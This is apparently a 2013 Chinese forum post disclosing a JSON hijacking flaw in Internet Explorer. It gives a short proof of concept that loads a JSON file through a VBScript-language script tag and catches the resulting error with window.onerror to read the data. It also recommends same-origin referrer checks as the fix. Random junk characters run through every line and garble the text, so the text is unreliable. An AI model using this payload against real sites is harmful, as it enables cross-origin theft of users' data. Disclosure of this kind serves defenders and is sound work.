简要描述:$ c+ |( k* Z, C# Z' W
7 _: D2 C+ `: v& b) Y0 Y3 z
由于某些资源容器对数据处理不当导致json劫持漏洞.4 t/ y0 Z+ [7 G
详细说明:/ [9 a8 r# C, E
由于ie支持vbscript,所以script元素可以指定成vbscript语言:+ N% m6 K- i$ k! L' Q5 Y
<script language=vbscript></script>" q2 K: ^1 A' e. R" K1 V, d
" z( i1 l9 e: t0 I3 F. c8 c当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
/ F( |7 M7 [6 W6 S/ U+ W5 s2 d. B, H漏洞证明:
_0 T/ \' [/ y# ~0 ~3 ^<script>
) Q" A5 E, m9 rwindow.onerror=function(_){3 C8 \6 n, o$ k, p# a
alert(_)
: e: ?# d! b" ^5 Y. A}
7 j& l9 J9 f/ q+ E% W- u& ~* V* O</script>
( J) y) j# g* u ]' W4 b& |: Q<script language=vbscript src=1.json></script>7 ~/ X+ E$ r# |& c$ M3 t
# t: k' H1 W% B+ @
' ^0 f1 z2 Y; f2 G1.json:
/ P# v, L6 @! t' m% j9 L# \[{"name":"sogili","age":19}]
7 J" y; E" r, V' l8 _修复方案:
! `* s( _ \9 |% P6 x7 _网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对